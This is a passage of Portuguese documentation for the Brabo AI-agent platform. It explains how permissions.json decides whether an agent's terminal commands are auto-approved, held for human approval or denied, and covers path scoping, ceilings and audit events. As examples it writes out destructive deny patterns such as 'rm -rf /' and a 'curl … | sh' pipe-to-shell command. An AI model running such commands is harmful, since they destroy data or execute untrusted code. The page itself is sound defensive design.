<div class="language-text codeBlockContainer_VI6N theme-code-block" style=--prism-color:#F8F8F2;--prism-background-color:#282A36><div class=codeBlockContent_Ph5s><pre tabindex=0 class="prism-code language-text codeBlock_o5bC thin-scrollbar" style=color:#F8F8F2;background-color:#282A36><code class=codeBlockLines_m_R9><div class=token-line style=color:#F8F8F2><span class="token plain">Terminal(rm -rf /)</span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain">Terminal(rm -rf /*)</span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain">Terminal(rm -fr /)</span><br/></div></code></pre></div></div>
<p>Não são uma lista de segurança abrangente — são um piso. A proteção de verdade
vem de <code>allow</code> ser explícito e de tudo o mais cair em aprovação.</p>
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=o-que-a-ativação-da-execução-semeia>O que a ativação da execução semeia<a href=#o-que-a-ativação-da-execução-semeia class=hash-link aria-label="Link direto para O que a ativação da execução semeia" title="Link direto para O que a ativação da execução semeia" translate=no>​</a></h2>
<p>Ativar a execução escreve no <code>allow</code> do projeto os padrões de
<code>DEV_TERMINAL_ALLOW_PATTERNS</code> (<code>apps/api/src/domain/actions/dev-terminal-patterns.ts</code>).
São duas famílias:</p>
<ul>
<li class=""><strong>leitura do próprio worktree</strong> — <code>ls</code>, <code>pwd</code>, <code>find</code>, <code>cat</code>, <code>head</code>, <code>tail</code>,
<code>grep</code>, <code>wc</code>, <code>echo</code>, <code>git status</code>, <code>git diff</code>, <code>git log</code>;</li>
<li class=""><strong>build e teste</strong> — <code>pnpm install</code>, <code>pnpm test</code>, <code>npm run</code>, <code>npx vitest</code>,
<code>mix test</code>, <code>pytest</code>, <code>go test</code>, <code>cargo test</code>, entre outros.</li>
</ul>
<p>A segunda família existe porque <code>ReportDone</code> só deixa abrir PR depois de um
<code>terminal</code> com <code>exit 0</code> no histórico. A primeira existe porque o agente <strong>olha
antes de construir</strong>: sem ela, cada <code>ls -la</code> num repositório recém-provisionado
caía em aprovação, voltava como <code>status pending</code> — e não como a saída do
comando — e queimava uma iteração do ToolLoop até a task morrer por limite
(ver <a class="" href=/brabo/dev/business-rules#rn-068>RN-068</a>).</p>
<p>Isto NÃO afrouxa nada do que está acima. Continua valendo que <code>deny</code> vence
<code>allow</code>, que os padrões embutidos seguem ativos, que o casamento é por prefixo
de <strong>token</strong> (<code>ls</code> liberado não libera <code>lsof</code>) e que comando composto exige que
CADA segmento case — então <code>ls && rm -rf /</code> não passa por causa do <code>ls</code>.</p>
<p>Auto-aprovar <code>terminal</code> por <code>agent_autonomy</code> seria diferente e não é o que se
faz: liberaria QUALQUER comando dentro do container do engine, sem o arquivo no
meio.</p>
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=a-ordem-completa-da-decisão>A ordem completa da decisão<a href=#a-ordem-completa-da-decisão class=hash-link aria-label="Link direto para A ordem completa da decisão" title="Link direto para A ordem completa da decisão" translate=no>​</a></h2>
<!-- -->
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=a-fronteira-do-container-rn-106>A fronteira do container (RN-106)<a href=#a-fronteira-do-container-rn-106 class=hash-link aria-label="Link direto para A fronteira do container (RN-106)" title="Link direto para A fronteira do container (RN-106)" translate=no>​</a></h2>
<p>Aplicada <strong>antes</strong> de qualquer estágio permissivo, e não como teto no fim: <code>git push</code>, <code>git remote add</code>/<code>set-url</code>, <code>git merge</code>, os CLIs de provider (<code>gh pr create</code>, <code>gh pr merge</code>, <code>glab mr create</code>/<code>merge</code>, releases e workflow dispatch)
e os comandos de deploy comuns (<code>kubectl apply</code>, <code>helm upgrade</code>, <code>terraform apply</code>, <code>docker push</code>, <code>npm publish</code>, ...) num comando <code>terminal</code> são <strong><code>deny</code>
imediato</strong>, qualquer que seja o <code>permissions.json</code> ou o <code>agent_autonomy</code>
(<a class="" href=/brabo/dev/adr/0065-container-por-projeto-a-fronteira-deixa-de-ser-politica>ADR 0065</a>).</p>
<p>Não é <code>require_approval</code> de propósito: existe "sempre permitir", que grava o
padrão em <code>allow</code> — bastaria um clique para essa segunda porta ficar aberta
para sempre. <code>deny</code> vence <code>allow</code> em qualquer estágio, e é a única forma que
não pode ser contornada por um clique só.</p>
<p>O casamento é por <strong>prefixo de tokens</strong> (<code>apps/api/src/domain/actions/external-effect.ts</code>),
ignorando flags globais no meio — <code>git -C /tmp push</code> casa <code>git push</code>. Cada
segmento de um comando composto é verificado: <code>pnpm test && git push origin main</code> é barrado pelo segundo segmento, do mesmo jeito que o comando composto já
exige que todo segmento case para virar <code>auto_approve</code>.</p>
<p>Negar não tira poder do agente: a mensagem de erro diz qual ação <strong>tipada</strong>
usar — <code>git_push</code>, <code>git_merge</code> ou <code>pr_open</code> — que nasce <code>proposed_action</code>,
segue o pipeline normal (papel mínimo, decisão do usuário) e registra no event
log o que foi empurrado e para onde. É o caminho que o dev agent já usa hoje
para propor push (<code>agent_io.ex</code>); o que muda é que agora ele é o <strong>único</strong>
caminho, garantido por código.</p>
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=escopo-de-caminho>Escopo de caminho<a href=#escopo-de-caminho class=hash-link aria-label="Link direto para Escopo de caminho" title="Link direto para Escopo de caminho" translate=no>​</a></h2>
<p>Um comando de <code>terminal</code> é avaliado também por <strong>onde ele toca</strong>, não só pelo
verbo (<a class="" href=/brabo/dev/adr/0055-escopo-de-caminho-na-politica-de-terminal>ADR 0055</a>,
<a class="" href=/brabo/dev/business-rules#rn-075>RN-075</a>). A pasta do projeto —
<code>&lt;PROJECT_WORKSPACES_ROOT>/&lt;workspace_dir_name></code>, onde vivem o
<code>permissions.json</code> e todos os worktrees de agente — é o <strong>escopo</strong>.
<code>workspace_dir_name</code> (<a class="" href=/brabo/dev/adr/0066-nome-de-pasta-legivel-do-workspace>ADR 0066</a>,
<a class="" href=/brabo/dev/business-rules#rn-109>RN-109</a>) é o nome de pasta congelado na
criação do projeto — legível (<code>&lt;slug>-&lt;8 chars do id></code>) num projeto novo, o
UUID puro num projeto de antes dessa mudança.</p>
<p>A comparação de caminho é <strong>léxica e sem regex sobre a entrada</strong>: o corte de
barras finais é varredura O(n), não <code>.replace(/\/+$/, '')</code>. O padrão antigo foi
apontado pelo CodeQL como ReDoS polinomial (HIGH) — ele obriga o motor a tentar
cada posição inicial, e degrada em O(n²) com muitas barras. A entrada aqui vem
de comando de agente, então não é lugar de regex que retrocede.</p>
<p>O escopo faz duas coisas opostas, e é a combinação que importa:</p>
<p><strong>Aperta.</strong> Um comando que toca caminho de fora nunca é auto-aprovado, por mais
que o verbo esteja em <code>allow</code>. Sem isto, <code>Terminal(cat)</code> liberado auto-executava
<code>cat /workspace/apps/engine/lib/engine/actions/git_executor.ex</code> — o código da
plataforma que executa o agente — e alcançava o worktree de outros projetos.</p>
<p><strong>Afrouxa.</strong> Dentro do escopo, <code>cd</code> deixa de ser um verbo que precisa de
permissão: ele é a própria declaração de escopo. Sem isto, o dev agent, que
emite sempre <code>cd &lt;caminho> && &lt;verbo></code>, esbarrava na regra do comando composto
— todo segmento precisa casar — e <strong>todo</strong> comando parava para aprovação, por
mais que o verbo estivesse liberado.</p>
<p>Três limites que valem entender:</p>
<ul>
<li class=""><strong>Escopo permite, não isenta.</strong> Estar na pasta do projeto não torna
<code>curl … | sh</code> seguro: verbo fora do <code>allow</code> continua pedindo aprovação.</li>
<li class=""><strong>Fora do escopo é <code>require_approval</code>, não <code>deny</code>.</strong> O agente pode ter razão
legítima para olhar fora; quem decide continua sendo você.</li>
<li class=""><strong>A normalização é léxica, não <code>realpath</code>.</strong> <code>&lt;raiz>/../..</code> é resolvido e
reprovado; um link simbólico dentro do projeto apontando para fora <strong>não</strong> é
detectado. Escopo é política, não isolamento.</li>
</ul>
<p>Quais tokens são verificados: os <strong>absolutos</strong> (começam com <code>/</code>) e os que
contêm <code>..</code>. Um relativo sem <code>..</code> resolve sob o <code>cwd</code>, que já foi verificado —
e tratar <code>-maxdepth</code>, <code>4</code> ou <code>*.ex</code> como caminho reprovaria comando legítimo
sem ganhar segurança.</p>
<p>Duas propriedades que caem daí:</p>
<p><strong><code>deny</code> vence na hora.</strong> Não importa em que estágio apareça, retorna
imediatamente. Não existe configuração que reverta um <code>deny</code>.</p>
<p><strong>Um estágio silencioso nunca rebaixa.</strong> Se <code>agent_autonomy</code> disse
<code>auto_approve</code> e o <code>permissions.json</code> não tem regra para aquela ação, o
resultado continua <code>auto_approve</code> — o arquivo não "vota contra" por omissão.
Cada estágio só pode subir a permissividade do anterior.</p>
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=os-tetos>Os tetos<a href=#os-tetos class=hash-link aria-label="Link direto para Os tetos" title="Link direto para Os tetos" translate=no>​</a></h2>
<p>Aplicados <strong>por último</strong>, depois de todo o resto:</p>

























<table><thead><tr><th>teto<th>efeito<th>por quê<tbody><tr><td><code>git_merge</code> com destino em <code>dev</code>, <code>qa</code>, <code>rc</code> ou <code>main</code><td><code>auto_approve</code> → <code>require_approval</code><td>merge em branch protegida é sempre decisão sua (<a class="" href=/brabo/dev/business-rules#rn-006>RN-006</a>)<tr><td><code>instruction_patch</code><td><code>auto_approve</code> → <code>require_approval</code><td>você precisa ver o diff antes que um agente mude o comportamento de outro (<a class="" href=/brabo/dev/business-rules#rn-007>RN-007</a>)<tr><td><code>parallelize</code> e <code>raise_max_parallel</code><td><code>auto_approve</code> → <code>require_approval</code><td>gastar com mais agentes é decisão sua; sem este teto o limite do lead seria decorativo, e subir o próprio teto seria o produto elevando o limite de gasto dele mesmo (<a class="" href=/brabo/dev/business-rules#rn-086>RN-086</a>)</table>
<p>Um teto rebaixa <code>auto_approve</code> para <code>require_approval</code>; ele <strong>não</strong> transforma
<code>deny</code> em outra coisa, porque <code>deny</code> já teria retornado antes.</p>
<p>:::note Por que <code>rc</code> ainda está na lista</p>
<p>O degrau <code>rc</code> saiu da política de branches
(<a class="" href=/brabo/dev/adr/0030-politica-de-branches-mecanizada>ADR 0030</a>) e o bootstrap
parou de criá-lo (<a class="" href=/brabo/dev/business-rules#rn-029>RN-029</a>) — mas ele continua
aqui, em <code>domain/actions/protected-branches.ts</code>.</p>
<p>Esta lista decide o que a trava de merge <strong>recusa</strong>, e repositórios
bootstrapados por versões anteriores do Brabo ainda têm a branch. Tirá-la daqui
não removeria nada do repositório de ninguém: só tornaria um <code>git_merge</code> com
destino em <code>rc</code> auto-aprovável, numa branch que alguém pode estar usando como
produção.</p>
<p>Proteger uma branch que não existe não custa nada. Desproteger uma que existe
custa caro — e a assimetria é deliberada.</p>
<p>:::</p>
<p>A diferença entre um teto e um default: o default é o que acontece quando
ninguém configurou nada; o teto é o que acontece <strong>independente</strong> do que foi
configurado.</p>
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=o-que-acontece-com-o-agente-enquanto-a-decisão-não-vem>O que acontece com o agente enquanto a decisão não vem<a href=#o-que-acontece-com-o-agente-enquanto-a-decisão-não-vem class=hash-link aria-label="Link direto para O que acontece com o agente enquanto a decisão não vem" title="Link direto para O que acontece com o agente enquanto a decisão não vem" translate=no>​</a></h2>
<p>Uma ação <code>pending</code> não é só uma linha esperando clique: do outro lado há um
agente parado.</p>
<p>Quando a ferramenta que ele chamou fica pendente, o laço dele <strong>suspende</strong>
retendo task, worktree e o histórico da conversa, e ele entra em
<code>awaiting_approval</code>. Sua decisão emite <code>task.action_settled</code>, que o acorda: o
resultado real do comando ocupa o lugar onde estaria a resposta, e o laço retoma
do ponto em que parou.</p>
<p><strong>Recusar também responde.</strong> O motivo entra no lugar do resultado, e o agente
aprende que aquele caminho está fechado em vez de esperar para sempre — negar
não o deixa travado.</p>
<p>Isso importa para quem opera: aprovar tarde não desperdiça o trabalho já feito,
e a fila de aprovações não é assíncrona por conveniência — ela é o que o agente
está literalmente esperando. Antes disso, o <code>pending</code> voltava como se fosse a
resposta do comando, e o agente gastava o teto de iterações tentando outra coisa
até a task morrer sem uma linha escrita
(<a class="" href=/brabo/dev/business-rules#rn-073>RN-073</a>).</p>
<p><strong>Com uma exceção: reinício do engine.</strong> O laço suspenso vive em memória, então
um restart o leva junto. Nesse caso a task <strong>não</strong> fica esperando: ela volta
para a fila bloqueada, com o motivo e origem <code>infra</code> no event log, e uma decisão
tomada depois disso não tem mais onde ser aplicada — a ação decidida fica
registrada, mas o turno que a esperava não existe mais. Se você aprovou e nada
aconteceu, é esse o primeiro lugar para olhar.</p>
<p>A auto-aprovação não passa por aqui: ela executa na proposta e o resultado volta
no mesmo turno — que é justamente o valor de ter os padrões da seção anterior.</p>
<h2 class="anchor anchorTargetStickyNavbar_URsz" id=o-que-fica-escrito-de-cada-decisão>O que fica escrito de cada decisão<a href=#o-que-fica-escrito-de-cada-decisão class=hash-link aria-label="Link direto para O que fica escrito de cada decisão" title="Link direto para O que fica escrito de cada decisão" translate=no>​</a></h2>
<p>Toda ação proposta e toda decisão sobre ela viram <strong>evento de domínio</strong> em
<code>session_events</code>, com o ator real (<a class="" href=/brabo/dev/business-rules#rn-049>RN-049</a>):</p>






























<table><thead><tr><th>evento<th>ator<th>quando<tbody><tr><td><code>proposed_action.created</code><td>o <strong>agente</strong> que propôs<td>sempre, antes de qualquer execução. <code>payload.status</code> diz como a ação nasceu: <code>pending</code>, <code>auto_approved</code> ou <code>denied</code><tr><td><code>proposed_action.approved</code><td>o <strong>usuário</strong> que clicou<td>só na aprovação manual (inclusive <code>approve_always</code>)<tr><td><code>proposed_action.denied</code><td>o <strong>usuário</strong> que recusou<td>com <code>payload.reason</code><tr><td><code>action.executed</code> / <code>action.failed</code><td><code>system</code><td>desfecho da execução</table>
<p>Daí sai a única forma confiável de separar as duas coisas que este documento
descreve:</p>
<ul>
<li class=""><strong>decisão humana</strong> = contar eventos <code>proposed_action.approved</code>;</li>
<li class=""><strong>decisão da política</strong> = <code>proposed_action.created</code> com
<code>status: auto_approved</code> e ator agente. Ela nunca produz um <code>.approved</code>, e por
isso nunca é confundida com um clique.</li>
</ul>
<p>Isso não era verdade até a Fase 12e. As três primeiras linhas iam <strong>só para o
outbox</strong>, que é transporte — drenado, marcado com <code>processed_at</code> e podado — e a
decisão sobrevivia apenas em <code>proposed_actions.decided_at</code>, uma coluna fora da
linha do tempo que a UI, o Psicólogo e a Anamnese leem. O resultado prático foi
que "quantas vezes o humano aprovou" não pôde ser respondido no dogfooding da
Fase 10, que era justamente a métrica principal daquele experimento.</p>
<p>O bootstrap de repositório é a exceção deliberada: as mutações que ele propõe
não emitem <code>proposed_action.created</code> no log, porque já são narradas por
<code>bootstrap.step_*</code> na mesma sessão — contá-las de novo inflaria a métrica de
aprovação com trabalho que ninguém aprovou.</div></div></div><div class=row><div class="col col--12"><footer class="theme-doc-footer docusaurus-mt-lg"><div class="row margin-top--sm theme-doc-footer-edit-meta-row"><div class="col noPrint_M5Wn"><a href=https://github.com/daneiel/brabo/blob/dev/docs/reference/permissions.md target=_blank rel="noopener noreferrer" class=theme-edit-this-page><svg fill=currentColor height=20 width=20 viewBox="0 0 40 40" class=iconEdit_eJZs aria-hidden=true><g><path d="m34.5 11.7l-3 3.1-6.3-6.3 3.1-3q0.5-0.5 1.2-0.5t1.1 0.5l3.9 3.9q0.5 0.4 0.5 1.1t-0.5 1.2z m-29.5 17.1l18.4-18.5 6.3 6.3-18.4 18.4h-6.3v-6.2z"/></g></svg>Editar esta página</a></div><div class="col lastUpdated_y3Pe"><span class=theme-last-updated>Última atualização<!-- --> em <b><time datetime=2026-08-09T22:11:53.000Z itemprop=dateModified>9 de ago. de 2026</time></b> por <b>Daniel Souza</b></span></div></div></footer></div></div></article><div class=row><div class="col col--12"><nav class="docusaurus-mt-lg pagination-nav" aria-label="Páginas de documento"><a class="pagination-nav__link pagination-nav__link--prev" href=/brabo/dev/reference/events><div class=pagination-nav__sublabel>Anterior</div><div class=pagination-nav__label>Eventos</div></a><a class="pagination-nav__link pagination-nav__link--next" href=/brabo/dev/reference/artifacts><div class=pagination-nav__sublabel>Próxima</div><div class=pagination-nav__label>Artefatos</div></a></nav></div></div></div></div><div class="col col--3"><div class="tableOfContents_P_6G thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href=#o-arquivo class="table-of-contents__link toc-highlight">O arquivo</a><ul><li><a href=#com-qual-credencial-a-ação-auto-aprovada-executa class="table-of-contents__link toc-highlight">Com qual credencial a ação auto-aprovada executa</a></ul><li><a href=#o-formato-do-padrão class="table-of-contents__link toc-highlight">O formato do padrão</a><li><a href=#como-um-padrão-casa-com-um-comando class="table-of-contents__link toc-highlight">Como um padrão casa com um comando</a><li><a href=#comando-composto class="table-of-contents__link toc-highlight">Comando composto</a><li><a href=#padrões-embutidos class="table-of-contents__link toc-highlight">Padrões embutidos</a><li><a href=#o-que-a-ativação-da-execução-semeia class="table-of-contents__link toc-highlight">O que a ativação da execução semeia</a><li><a href=#a-ordem-completa-da-decisão class="table-of-contents__link toc-highlight">A ordem completa da decisão</a><li><a href=#a-fronteira-do-container-rn-106 class="table-of-contents__link toc-highlight">A fronteira do container (RN-106)</a><li><a href=#escopo-de-caminho class="table-of-contents__link toc-highlight">Escopo de caminho</a><li><a href=#os-tetos class="table-of-contents__link toc-highlight">Os tetos</a><li><a href=#o-que-acontece-com-o-agente-enquanto-a-decisão-não-vem class="table-of-contents__link toc-highlight">O que acontece com o agente enquanto a decisão não vem</a><li><a href=#o-que-fica-escrito-de-cada-decisão class="table-of-contents__link toc-highlight">O que fica escrito de cada decisão</a></ul></div></div></div></div></main></div></div></div><footer class="theme-layout-footer footer footer--dark"><div class="container container-fluid"><div class="row footer__links"><div class="theme-layout-footer-column col footer__col"><div class=footer__title>Documentação</div><ul class="footer__items clean-list"><li class=footer__item><a class=footer__link-item href=/brabo/dev/getting-started>Primeiros passos</a><li class=footer__item><a class=footer__link-item href=/brabo/dev/architecture>Arquitetura</a><li class=footer__item><a class=footer__link-item href=/brabo/dev/business-rules>Regras de negócio</a><li class=footer__item><a class=footer__link-item href=/brabo/dev/runbook>Runbook</a></ul></div><div class="theme-layout-footer-column col footer__col"><div class=footer__title>Comunidade</div><ul class="footer__items clean-list"><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/CONTRIBUTING.md target=_blank rel="noopener noreferrer" class=footer__link-item>Como contribuir<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_lgoI><use href=#theme-svg-external-link /></svg></a><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/SUPPORT.md target=_blank rel="noopener noreferrer" class=footer__link-item>Onde pedir ajuda<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_lgoI><use href=#theme-svg-external-link /></svg></a><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/SECURITY.md target=_blank rel="noopener noreferrer" class=footer__link-item>Segurança<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_lgoI><use href=#theme-svg-external-link /></svg></a></ul></div><div class="theme-layout-footer-column col footer__col"><div class=footer__title>Mais</div><ul class="footer__items clean-list"><li class=footer__item><a href=https://github.com/daneiel/brabo target=_blank rel="noopener noreferrer" class=footer__link-item>GitHub<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_lgoI><use href=#theme-svg-external-link /></svg></a><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/CHANGELOG.md target=_blank rel="noopener noreferrer" class=footer__link-item>CHANGELOG<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_lgoI><use href=#theme-svg-external-link /></svg></a><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/LICENSE target=_blank rel="noopener noreferrer" class=footer__link-item>Licença MIT<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_lgoI><use href=#theme-svg-external-link /></svg></a><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/THIRD_PARTY_NOTICES.md target=_blank rel="noopener noreferrer" class=footer__link-item>Avisos de terceiros<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_lgoI><use href=#theme-svg-external-link /></svg></a></ul></div></div><div class="footer__bottom text--center"><div class=footer__copyright>Copyright © 2026 Daniel Souza. Licenciado sob a MIT. Ferramentas de terceiros mantêm as próprias licenças — ver Avisos de terceiros.</div></div></div></footer></div></body>